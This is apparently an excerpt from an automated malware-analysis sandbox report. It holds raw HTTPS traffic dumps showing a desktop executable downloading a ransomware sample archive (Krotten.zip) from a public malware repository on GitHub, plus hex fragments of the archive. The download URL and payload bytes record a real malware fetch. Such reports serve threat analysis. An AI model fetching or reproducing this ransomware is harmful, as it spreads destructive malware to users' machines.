                                                                                                                                                2022-09-29 12:51:20 UTC1145INData Raw: 99 97 dc 51 88 41 49 9d 05 6a 28 ab b9 c8 f8 c8 d7 b3 73 86 e3 4e 9d ce f7 49 80 93 16 e3 1c 2a 2c dd f1 b3 73 eb 9c fc 64 c6 c4 d8 84 cc 43 13 f3 ca 11 fa ab b6 f2 42 32 a6 47 24 15 4d d8 2b 2f fd 5c 26 2c b6 c0 3a 91 ba 4b 72 f2 34 18 23 c3 69 4d 46 3a 16 69 a5 6c 5a 2e 1a dd e5 f3 76 d4 6c 2b 5c 9d f7 47 48 22 bc a0 44 a1 2f b7 87 fe 73 35 51 b5 e8 f0 2e 02 bc b6 5d bc f8 d9 21 37 97 ed 15 2d 97 d7 af 69 38 39 da 5e 4b e7 55 89 56 de fe 6b fa a1 cb f0 35 55 88 44 79 bd 3d af dd f9 1d 89 94 37 be 9d b3 4b 1e 85 dc 0b a1 74 ce 3d fe 07 c6 fa 07 44 d8 47 34 c7 eb 12 19 3f 9c 06 9f aa 6b 14 2b f5 23 97 99 e9 64 c2 74 f8 1c 02 1c 5b d1 2f 85 69 c7 ec 29 a8 fe 6c 65 92 31 f6 fd 76 1a cb ce 2b f0 d7 5f 94 ed da 22 59 fd c7 2d e2 4d b9 fc 75 1c 76 0e 96 42 9f
                                                                                                                                                Data Ascii: QAIj(sNI*,sdCB2G$M+/\&,:Kr4#iMF:ilZ.vl+\GH"D/s5Q.]!7-i89^KUVk5UDy=7Kt=DG4?k+#dt[/i)le1v+_"Y-MuvB
                                                                                                                                                2022-09-29 12:51:20 UTC1147INData Raw: 6c a1 54 e6 90 d9 b7 57 3e a4 09 d0 d6 2f e9 7b 42 ff 1d df 26 c9 08 ba 22 6f 7e 72 86 36 1b 2c cf 74 50 49 ed 36 9d f5 ac 01 61 88 a6 38 bc 81 81 be 2e d9 e2 62 ea 81 fe 75 a9 28 74 77 ce a8 72 d5 04 dc 9d e3 24 d8 b1 e4 28 84 57 0c c6 6f 1c 88 f5 08 91 4f 25 16 b8 1c c2 f5 e8 ed b8 f7 23 85 18 a4 73 9f 6b 62 e3 ab ab fe 26 2e fe a9 68 aa 33 53 cc 0a 79 87 20 0a 16 3c ca 61 2c fd d7 6d eb 07 e4 3b d2 01 4e 39 a9 94 2a c5 7b 09 ad d6 1f c8 5b 6f 59 3f 1b 82 80 c8 b6 e8 d7 dd 66 07 b4 38 a9 f8 35 90 73 67 73 f3 6b f2 f6 a6 36 83 e5 ec 9b bc a6 0e 57 b0 c0 f1 fd c1 d2 e5 28 8c 9c 46 a5 f7 21 f5 65 52 99 7e f3 e8 49 e7 d8 1a 0d 95 4b 7a aa a3 01 f2 ec e7 3a 6c 76 4f 59 0d da 24 f9 7a d4 dd 77 24 ed 5e 88 80 30 f7 bb a7 79 b5 bf 70 66 a7 cf d3 b4 f7 0b c6 38
                                                                                                                                                Data Ascii: lTW>/{B&"o~r6,tPI6a8.bu(twr$(WoO%#skb&.h3Sy <a,m;N9*{[oY?f85sgsk6W(F!eR~IKz:lvOY$zw$^0ypf8
                                                                                                                                                2022-09-29 12:51:20 UTC1148INData Raw: e0 c0 34 a5 0c 90 69 48 cc 24 58 1f 70 b3 c8 75 1a d9 ba fc a4 ca 79 be 92 93 29 cc 13 a9 fc ea 16 8b 44 9a d0 d1 28 5f 26 f3 24 db 9f e7 51 40 94 ce e5 f5 5f 37 68 87 e3 89 e1 f3 37 d1 a8 d5 30 b3 3f 70 06 ff 4a b6 4e d9 37 0e 1a 82 3c 5f 1f 4c 47 ba 81 35 0d 76 f5 39 75 6b 36 d9 80 8a 57 85 98 e9 ab 51 fb 0c ab 66 97 28 e3 2f 49 d1 6d 67 7d 37 ff f3 31 1c 5f f6 66 c6 22 c5 52 83 35 c2 81 3a 40 85 f2 b5 b6 22 54 4e 77 61 c8 e7 de 0e 11 d8 a7 f7 da a1 80 cd f8 3c 39 89 7b 95 0c 3e 35 63 fc ff 7d 15 17 b7 68 48 cb b8 8e 2c 64 ce 5a 13 93 26 83 1d 47 b4 99 94 85 cc 1f 88 bc 75 b2 8c bd 9f 67 ab e3 2e d0 55 4d 79 86 63 0b f8 ee db d4 12 13 6f a3 c3 c1 cd 96 4d 99 fd c1 fe f5 60 c4 c4 40 3d 88 c4 57 d4 97 ad 92 6c 96 10 b1 90 34 88 f0 94 d7 db b1 19 3c 86 7e
                                                                                                                                                Data Ascii: 4iH$Xpuy)D(_&$Q@_7h70?pJN7<_LG5v9uk6WQf(/Img}71_f"R5:@"TNwa<9{>5c}hH,dZ&Gug.UMycoM`@=Wl4<~
                                                                                                                                                2022-09-29 12:51:20 UTC1149INData Raw: 8d 62 1d b4 17 3c 66 f1 37 a1 f7 78 79 5c 1d 4f 0b e7 fb 63 e3 cc 87 9c 67 e6 d4 e6 95 ac ac 3b 0a ff 55 0c b2 bf fc 45 f6 b9 2e f2 51 68 cd d2 2d 71 22 4d 67 79 e6 d2 20 03 e9 86 23 95 41 83 9b e1 84 66 df cc 97 ff 90 2d 8c c4 00 54 3e 00 03 66 68 03 89 5c ae 1d 72 31 aa f6 e9 38 e7 b5 1a d4 63 39 71 bb 17 84 55 ba 8f 6b f3 82 45 77 c0 22 d8 c6 cb 1c ba 04 2d 48 0c 72 e2 e4 77 04 25 b2 d1 55 4e 97 21 19 2f ef 84 5e be fe 91 7c 9b 89 73 1d 15 71 ba 34 ab 50 8c 99 24 18 9f 28 b9 1d 4e 51 2b 1a d7 3e 02 f2 f4 bd 8e 37 b4 fe 66 28 81 b7 a2 de f3 25 ee 00 dc 95 13 83 35 ad 90 b8 08 ce ac 75 33 e3 59 83 f5 29 99 e3 b8 c5 18 36 30 b7 89 21 05 05 4b 85 af 4a 05 b0 1a f0 66 72 8b 31 2f 30 60 9b ee 74 f9 68 70 15 44 13 08 81 c4 26 44 fa 13 f7 82 dd 1b 87 3c 31 cb
                                                                                                                                                Data Ascii: b<f7xy\Ocg;UE.Qh-q"Mgy #Af-T>fh\r18c9qUkEw"-Hrw%UN!/^|sq4P$(NQ+>7f(%5u3Y)60!KJfr1/0`thpD&D<1


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                12192.168.2.549712140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:20 UTC1150OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:20 UTC1150INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:13 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:20 UTC1151INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                13192.168.2.549713185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:21 UTC1153OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:21 UTC1153INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 26359
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "b4c9a9caad9a8cc039faac50748e91b4ea099c21f7a0b4b606256ae51df449bc"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 080E:67C0:101BE30:11154D1:6335932F
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:21 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6946-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455881.099766,VS0,VE1
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 63dd4f06e2928bb90bce574060d3e0156d4d0c35
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:21 GMT
                                                                                                                                                Source-Age: 46
                                                                                                                                                2022-09-29 12:51:21 UTC1153INData Raw: 50 4b 03 04 33 00 01 00 63 00 cf a3 e4 38 00 00 00 00 2f 66 00 00 29 d5 00 00 16 00 0b 00 45 6e 64 65 72 6d 61 6e 63 68 40 4b 72 6f 74 74 65 6e 2e 65 78 65 01 99 07 00 02 00 41 45 03 08 00 51 1f 85 1c 8b 3e 2c 09 fa d6 8a ea d4 7d 01 2f 41 8d 8b 07 f0 fd bb 72 93 3d 0e ed 40 4e 7a 13 95 d4 dd 52 47 43 5a fe 98 0e 0e 17 7b 8d 0b 48 2a e1 a6 38 9c 0d 69 c0 a2 4e b7 13 22 57 2e 2b 04 a2 0e 40 b8 3b 45 f0 af 7f 66 fa c6 fd 85 22 c0 6c 99 74 ef 66 9e f4 72 6a d9 dc 4d 40 bf 11 c6 56 7f 5a ef ee 2f ee 69 5e 5a 83 44 c1 e1 ac 9e 0d 4a 58 19 bc d5 4a ed 6d 0f 35 24 46 b4 51 93 93 a8 4a d0 a7 d9 78 fe 72 46 e5 ea dd ae 9f d1 96 48 23 2c 3a 7f d8 74 27 ef d1 37 1b d5 be bd 4a 4b 51 4a c2 83 3d a5 d6 81 75 5c f0 dc 4d 2c f1 64 1c 28 3c 89 b5 e7 cd 2c 29 bf 64 4a f0
                                                                                                                                                Data Ascii: PK3c8/f)Endermanch@Krotten.exeAEQ>,}/Ar=@NzRGCZ{H*8iN"W.+@;Ef"ltfrjM@VZ/i^ZDJXJm5$FQJxrFH#,:t'7JKQJ=u\M,d(<,)dJ
                                                                                                                                                2022-09-29 12:51:21 UTC1155INData Raw: 7e 07 d3 91 36 cc 6c 5d e7 86 c4 bb 68 42 cb 46 fd 3d 53 ef 9a 53 c0 07 a2 a2 fb 2d 2a 97 b1 11 17 27 a3 e2 cd e6 8b 85 1d b8 5e 1d 76 5f f8 48 bb 13 ea 13 88 ed e9 39 9b e4 4f 1d 5b 57 77 14 89 a3 33 0d cd 2d 1c a3 b3 8f 4a fb 61 14 c1 c0 39 92 61 fb ba ad 73 31 0e 78 fb 55 f8 ea e5 36 47 f5 37 b6 48 f6 3b 4f 2f 13 bc 87 5e bb f9 a8 84 93 8b 7f aa e9 ba c2 df 48 f0 a1 09 4c f2 2b c0 26 c3 ec ad 2b 27 48 54 35 3e e4 a1 2f 4a f1 e5 3e 63 45 93 59 ee c1 17 10 cf b7 0a 01 bb 2f 3e 40 e2 96 e7 96 1a 65 42 0d b5 43 d2 26 07 82 cd df 4d 59 00 b3 27 c4 5b 05 2d ba 78 12 48 47 84 96 1e 22 12 c6 b7 9a da 78 5f 2a 58 63 aa ab 3e 4c 26 88 77 b3 73 e9 78 ad 2e 31 a3 8d 09 c2 64 6e 25 01 35 42 06 f8 72 fb 72 b0 c2 ea 64 0b a0 18 d6 f5 0e 30 3d a2 29 67 9c d9 e2 58 45
                                                                                                                                                Data Ascii: ~6l]hBF=SS-*'^v_H9O[Ww3-Ja9as1xU6G7H;O/^HL+&+'HT5>/J>cEY/>@eBC&MY'[-xHG"x_*Xc>L&wsx.1dn%5Brrd0=)gXE
                                                                                                                                                2022-09-29 12:51:21 UTC1156INData Raw: ae 9b f4 c8 3e 7a 74 41 7b b8 2e ef b9 95 a5 e1 52 93 e0 18 af 7b b9 ea ba 7b 09 b8 17 56 3d a0 ca 02 f9 9b 23 a6 23 9e 8c 82 2a 51 2d ae fa eb 89 45 7d 46 5a 53 57 b8 c1 6d 3e 2f e7 2c 0f 04 0a 5b 12 53 71 4f 7d 32 3a 8f 94 81 58 12 b4 7e de 48 b5 d8 5e 26 a8 29 8c f2 e7 dd 9e 5c 9b 12 97 03 2f a5 aa ae a6 44 c9 8c 27 5e 3d 44 7f 98 c1 7d b7 eb 24 f4 de 5c bb b7 0e 9a 9b 9b 01 dd 79 93 79 ed 98 38 ee 61 5f aa fe bb 18 d8 3d 45 53 62 54 d1 13 69 5f 7e 2b 69 18 e8 13 16 e4 87 29 83 8f 25 c0 a9 31 16 a8 65 7f 4c 60 16 f1 7e f1 84 12 21 9c eb 16 48 d2 71 8e 2d 24 2e 5b 04 a5 15 05 54 ed 5a 03 e5 b6 e8 b5 fb ab b6 69 c6 44 53 36 d5 c4 68 3c 7c 15 85 3c ef 6d 35 c6 12 10 a5 a8 c2 57 32 ac eb 19 32 2a dd 65 ad ef ab 60 5c 7e a3 75 bb c1 75 12 5b 8a e6 78 62 14
                                                                                                                                                Data Ascii: >ztA{.R{{V=##*Q-E}FZSWm>/,[SqO}2:X~H^&)\/D'^=D}$\yy8a_=ESbTi_~+i)%1eL`~!Hq-$.[TZiDS6h<|<m5W22*e`\~uu[xb
                                                                                                                                                2022-09-29 12:51:21 UTC1157INData Raw: 63 53 b5 5a bd a6 44 ed d9 02 99 fd 6d 6d ab 31 2c 4d bc f8 f9 95 69 f6 43 4b 13 52 40 19 68 1c b0 8c e2 5a 3a f6 88 cc c7 c6 c8 71 72 db 85 65 79 a0 88 1c 80 52 78 5b 2d dd 51 d6 7f 1d 38 2d d3 5b 59 42 3b f4 13 9d 5c 5d 72 ae 9d eb 83 7c 49 15 9f a8 14 1b 11 da 86 cb a4 f9 88 40 ac dc 36 33 46 30 9a 6e a6 77 18 db 85 67 b2 59 0d a1 be 95 ac 10 10 a4 b7 18 9d e1 0a c5 f8 66 34 91 d0 be f5 c7 25 79 26 b6 65 28 29 29 99 e4 46 c4 88 3e ce 9c 57 ff 55 a8 80 fe 7f fd 7c 98 22 2b 0c 6f d1 cc 8f ec 1c 6c fc c5 e7 86 f8 30 94 c8 d2 bd 71 93 63 53 1c 20 5d 85 ed dc 9f 63 68 db 93 bc 04 40 b0 b5 3c 33 54 17 f8 ea 5c 74 6a 62 3b ab a2 30 36 df 5a 6b df 31 b7 c3 7e 60 ae e4 11 7c d3 d6 8b 46 b1 b7 39 f1 8e 30 4f 4f 1d fa 7a e1 0b 66 74 50 05 fe 6c a9 34 e8 2d 6a 5d
                                                                                                                                                Data Ascii: cSZDmm1,MiCKR@hZ:qreyRx[-Q8-[YB;\]r|I@63F0nwgYf4%y&e())F>WU|"+ol0qcS ]ch@<3T\tjb;06Zk1~`|F90OOzftPl4-j]
                                                                                                                                                2022-09-29 12:51:21 UTC1159INData Raw: f5 a8 e8 97 c4 0b fe 16 47 d3 16 f6 3a 4f 3b 1c d2 7e 95 8d 8e 11 45 2a 99 15 52 4a c4 71 73 a9 d6 e3 4e 2b a9 78 b3 c5 19 0f ea da 8c 7e e2 e1 75 2e cb e0 4a 03 90 4e 4a a3 9c be 32 22 b2 b8 14 8d fb 10 64 57 4e ae 9f ad 68 fc 78 f9 ca 1f b6 91 ca 2f 0f 5c a4 0c 9a cf 28 74 c9 b8 bb 29 06 db 9a 57 ae 02 18 e5 2b 4f 1c 67 68 f0 5c ee 75 50 2a ee 4a 88 f8 d1 d1 53 8d 23 83 b5 dd 06 61 05 0c 53 e3 a8 92 b2 87 61 f8 f7 c4 58 44 f9 ab 63 b8 2f 84 4d e1 96 55 0f 91 a9 93 5b 57 24 8b dc 32 55 7c 58 b9 04 7a 1a e7 e3 05 2a c1 4b 10 92 2b 70 49 49 5f 46 d1 49 8e c0 61 47 58 4a f1 10 2a 27 a2 e8 1c 68 f9 72 8d 98 93 a8 78 65 8e c1 d5 3f d1 95 f9 16 a0 50 ba a0 f1 dd 58 fd 1c 2a 0d 08 94 13 2f 00 2e 59 f8 17 f2 b3 d2 6c dd 48 6c 60 0e f7 69 40 4f a8 a3 6a a2 ea 2c
                                                                                                                                                Data Ascii: G:O;~E*RJqsN+x~u.JNJ2"dWNhx/\(t)W+Ogh\uP*JS#aSaXDc/MU[W$2U|Xz*K+pII_FIaGXJ*'hrxe?PX*/.YlHl`i@Oj,
                                                                                                                                                2022-09-29 12:51:21 UTC1160INData Raw: ba 77 e6 2f d6 40 2b 3a c1 10 19 77 c3 68 7f d4 d8 45 87 3c d6 57 f7 ec 4a d5 22 af 4e f8 57 c0 27 85 f5 df 71 1b b8 86 72 f0 d7 e8 69 db 35 76 2f ab ad 22 d7 be 42 85 02 6e 01 ac 30 c4 0b e7 a3 fa ef b1 e9 08 b9 a1 2d 2d 1b e7 18 57 f9 cc 25 5d 9b 96 81 bc 22 13 0a db 67 3d 05 e2 85 0b 4b 29 b6 7d 64 33 99 b2 71 e0 33 ba 56 7a ef 26 80 3c dd b1 b1 d3 cc d8 20 b7 3c 7e 97 e3 c1 ed a9 aa a0 fa d7 7f fc b0 2a 94 79 29 28 fa 3a a7 85 7d 7e f8 3d 2d ee 4e 1a 51 20 c6 22 75 56 77 ef e2 62 e0 05 7f 4c 66 b1 bf eb 6b 33 fe 39 e9 7e e3 eb 62 ce db 96 59 34 96 ac 7e 89 af 4c 57 a4 57 89 bb b0 cb 2a b8 35 e8 1f 37 68 b9 3a 91 80 aa be de f9 e4 67 8a a8 01 7a c4 81 7f cc 63 47 60 d5 20 10 bb ae c6 30 98 bc b1 e6 0e 64 60 62 63 a0 ee 94 f9 97 77 52 da dd 0c 2d 6a 6a
                                                                                                                                                Data Ascii: w/@+:whE<WJ"NW'qri5v/"Bn0--W%]"g=K)}d3q3Vz&< <~*y)(:}~=-NQ "uVwbLfk39~bY4~LWW*57h:gzcG` 0d`bcwR-jj
                                                                                                                                                2022-09-29 12:51:21 UTC1162INData Raw: e6 9c df 45 c9 81 e1 73 37 b0 b9 ee bf 4e 78 de ca cb 4c 4e cc e7 5d 75 ee 15 e9 94 8a 0d 0e 8a 83 83 7e 52 a2 17 35 f7 ff 3d 12 48 9e 38 cb 3c 1c d7 36 54 6a b4 c9 6c 2d c7 77 58 2b 60 ef 2d 09 43 26 d1 2f 6c b3 70 b3 d7 e5 7c 72 40 35 41 62 fd 85 d5 b8 5e ca 49 ff 22 eb cc 42 47 7d 91 08 5b 76 37 2a a7 c5 0d ff 9a a5 10 0c e6 6e e9 e5 b4 80 4c f5 32 cc b1 89 1c e8 72 fa b3 2a 7f 4c fc da 58 ae 76 51 6d a3 09 71 26 ff b2 a6 f4 bc 77 77 92 27 3d c2 64 9b 0d 0e be bc 21 54 6e 9c 7d 0c 93 3f 39 e9 0f 86 9c 08 87 6e b5 33 8a 1c d9 f7 44 1f 16 40 3e 22 fb a1 84 97 d5 c7 fb 11 c7 a7 07 9f ad b4 97 5c 4d bc 58 dc 0b 0c c8 a7 7c 1b d4 aa 61 56 78 81 78 94 e6 84 9d 1a 7a b8 2e fe 9f ab 08 a2 fe f6 2d 53 ee 45 34 40 b7 59 ee c8 f2 6a ae cc cb ad d7 28 70 08 01 77
                                                                                                                                                Data Ascii: Es7NxLN]u~R5=H8<6Tjl-wX+`-C&/lp|r@5Ab^I"BG}[v7*nL2r*LXvQmq&ww'=d!Tn}?9n3D@>"\MX|aVxxz.-SE4@Yj(pw
                                                                                                                                                2022-09-29 12:51:21 UTC1163INData Raw: 3b 7f 40 3b d1 ff 3b 95 d0 c1 af ab fa cb a9 83 a6 ac f8 7f b2 1e a2 b3 72 4e cc fa bb d1 99 3f 90 a2 b2 10 c6 44 3c 53 d0 2a 28 26 f7 e1 65 28 c2 18 9d 41 5e b8 81 6c ac c5 83 15 09 00 62 bf e8 b5 03 57 75 05 ac ed d3 db 48 4e 7a 1f d8 11 73 e7 8f 72 19 8c 50 7a 52 27 d2 af d8 64 fe 67 9b cc c2 9e f4 a8 bd 13 41 7e ab 73 ff ed e1 af b7 eb 1d a9 31 43 ee ad c4 bc ab 2d 49 27 ee 80 3d c4 b7 45 dc c8 bf 8f 4c dc 86 50 ee fd 5f 65 9e 77 09 b5 d2 3a 22 39 f9 7f 26 6a a2 52 a6 39 0f 78 e3 64 69 9c 5e 4d 2a e5 23 cd 88 ff 51 43 e7 4d c4 a7 81 c1 66 f8 6c a4 a2 0d be 5d 59 a9 d9 c4 8d 5c 45 0f 40 3f 72 f7 66 8d ef f4 56 61 8d 29 4b db 3c b8 25 01 d8 54 c4 89 80 f8 da 4d cc fb c2 31 4d fe 33 bd ae bf 2b ff 99 45 8e b3 2a be b8 9f b7 63 c1 c2 50 72 fb 58 e8 24 e3
                                                                                                                                                Data Ascii: ;@;;rN?D<S*(&e(A^lbWuHNzsrPzR'dgA~s1C-I'=ELP_ew:"9&jR9xdi^M*#QCMfl]Y\E@?rfVa)K<%TM1M3+E*cPrX$
                                                                                                                                                2022-09-29 12:51:21 UTC1164INData Raw: 28 9b 60 1e 71 b8 90 ee e6 49 14 f3 4c 4a 84 4d 24 40 91 9b 4a c8 8a 32 04 2c 23 f2 a5 55 2c 3a aa 65 3e 2d d2 4e f9 de 40 b9 c2 98 2e f2 35 b1 e7 f9 fb b1 12 b3 ca b8 75 3e ab 61 b9 8b 73 9b 1a e0 57 f4 39 39 ba 5f 35 80 61 23 90 86 0e c4 2e e8 12 7d 89 5b ac 2e 27 0e 1c 33 76 67 be 99 31 ce 75 23 0d 55 eb 67 aa 91 2f bd 76 13 97 92 61 58 52 20 42 05 c4 20 2b 18 ec 4a 9f ba 42 70 93 9e 72 9e 75 7b 42 09 0e 09 50 fc 92 5e 95 05 f2 b3 f3 ec 94 7a 2d ea c1 05 07 99 d2 7c c2 0f 06 96 5b 48 13 e9 92 f4 8b 89 b3 9a 7c 26 a5 27 06 78 2a f2 a9 b7 02 18 2a f9 af 29 b4 42 be bf d9 b4 1f da da 22 2f 0e 7c 10 b4 76 fd c5 74 94 ac 39 04 9e ff 9a f5 c7 b1 9c 5c 97 34 92 b7 75 07 72 ec 1a 1f 1e 82 b2 e3 30 96 47 ba 11 ce e0 07 01 6e bb be 65 f2 7f fd b5 c3 d5 23 ce 8d
                                                                                                                                                Data Ascii: (`qILJM$@J2,#U,:e>-N@.5u>asW99_5a#.}[.'3vg1u#Ug/vaXR B +JBpru{BP^z-|[H|&'x**)B"/|vt9\4ur0Gne#
                                                                                                                                                2022-09-29 12:51:21 UTC1166INData Raw: c7 11 83 83 4a d7 2f 05 22 24 93 49 ef 67 7e 71 b7 11 82 b1 65 d9 e8 5c b9 f1 a0 5c b0 d2 9d e8 f0 a0 a3 b6 47 b0 39 68 91 ca f0 09 55 d8 bc 30 8d d3 99 af b8 86 0b 29 c8 e1 7b 72 4f 12 a5 23 32 65 ac 6c 52 67 9f ee 69 11 f6 57 a0 fd 2e 11 5d 91 cb ce 0f ba 60 65 4d ca 8b 93 b3 9b a1 9c 73 0b 1a 59 aa 66 c8 3b 43 6d bf 99 c4 e3 2a 1d 23 bd e5 85 de 96 b9 59 ba 21 74 09 22 2f 61 7d 8a b8 ea 4d 9c ac 15 5d 2d a3 85 61 b9 87 f4 16 54 88 93 e7 4e 9b 79 fb 79 25 9b 51 7d 00 e9 15 90 4d 90 a8 0b b5 28 43 05 34 1a ad 6e 2c f3 e3 ad 4a 76 1e e7 ec f4 2f 4d 6d 77 dc e1 03 19 ef 7a 47 9b a0 2d f3 64 a0 b0 71 6e f4 dc 97 80 f8 48 90 0b 07 7f dd 86 97 d4 a3 fa d4 0c 10 ff 9f e9 f6 48 1a 47 d0 7b 51 6a 30 53 3f 6f 81 8a 9c 0e e8 67 56 16 e8 6b 4f c7 85 35 c0 f3 5b 9c
                                                                                                                                                Data Ascii: J/"$Ig~qe\\G9hU0){rO#2elRgiW.]`eMsYf;Cm*#Y!t"/a}M]-aTNyy%Q}M(C4n,Jv/MmwzG-dqnHHG{Qj0S?ogVkO5[
                                                                                                                                                2022-09-29 12:51:21 UTC1167INData Raw: 77 8f 84 bc 58 35 a6 bb 88 b1 f0 db af e7 13 aa 31 8b cb bc 9f d7 06 04 7f 3c 6c 70 95 f0 80 fc 2d 7f 89 b3 52 fd df 59 3f c7 32 f4 8b ab 20 1a 82 83 29 d6 3e 64 7e 5a 61 f2 2d 31 66 e1 c6 20 8d 20 1c 4d f1 79 7c af 83 cf ac 52 d2 3d 4c 88 0f 06 e1 5a 9d b4 25 83 d2 d4 b5 72 e3 8a f7 63 88 67 a2 98 9e c5 0a bd 7c e1 5c 79 7a 55 f2 c1 12 89 08 68 14 41 9d 2e f6 27 ce fb 04 c3 9f b5 91 46 95 d8 e2 d7 24 de b9 f1 06 c0 e7 1a 49 35 66 05 90 4b ea b0 ad a9 c7 c9 2d fc d9 4e 92 83 37 94 92 46 9e 0f 46 33 6b c9 c9 1f b2 b6 0d 8c ba 5c 42 30 84 72 d2 91 ec 9b d8 bd 5d 9c 89 db fd 83 a9 60 44 a5 86 2d d9 cd b1 3b e4 71 5f 33 ce a8 8d be a3 37 3d f0 6f 4c 72 49 a4 1b 10 56 a3 3b ac ff cb b2 9a 8c 60 8d 51 20 05 9d 2e 29 46 f1 b8 8f 41 1c 11 59 85 8b 74 20 97 0f 1a
                                                                                                                                                Data Ascii: wX51<lp-RY?2 )>d~Za-1f My|R=LZ%rcg|\yzUhA.'F$I5fK-N7FF3k\B0r]`D-;q_37=oLrIV;`Q .)FAYt
                                                                                                                                                2022-09-29 12:51:21 UTC1168INData Raw: 9c 6d f9 e7 6a 05 78 60 43 3a ae 4f c8 bd d4 99 fd 43 25 bb 0c 43 ce 48 67 45 23 bd 54 ed 8b 01 b0 2b 2d 16 56 55 a5 bb 5b 09 1b ca 3c 84 d9 3a af 4d ae 6c 80 a4 53 18 ea fc 3e fe 7c 59 a4 1d 5f 33 aa 13 67 82 b4 b9 b1 bf 28 19 71 1b 8a 00 16 19 1f b2 20 fa 2c 6a 68 77 e5 96 dc fc 38 76 0e 91 72 c6 fb 40 5c ef 1a ed 71 42 1d e2 23 47 17 13 35 36 ae 59 9b 79 56 b7 64 84 0b 27 53 d4 7c d7 4c bc 92 89 2a bb b4 4b 8b c1 0a 37 4b 06 50 05 1e 8c 9a 41 c7 95 50 4d 16 62 5b 53 d7 d4 c5 61 b3 03 ee 8e 90 d9 81 ff b1 b9 48 86 43 a5 6a 5e ee 47 da a4 b9 6f df d5 8c 61 3d 0a a2 8f 95 c4 5b 58 e4 02 2b 8f ec 45 01 7c d1 99 5a 40 5f 85 5d 4f 3d 31 39 62 0b dc 6f 1b 2b d6 75 c0 c1 b1 ac 30 cc af f7 8a ca 2d 87 70 d0 22 83 21 b6 55 85 86 09 f2 91 bf 93 05 7f 7d f2 ac 4b
                                                                                                                                                Data Ascii: mjx`C:OC%CHgE#T+-VU[<:MlS>|Y_3g(q ,jhw8vr@\qB#G56YyVd'S|L*K7KPAPMb[SaHCj^Goa=[X+E|Z@_]O=19bo+u0-p"!U}K
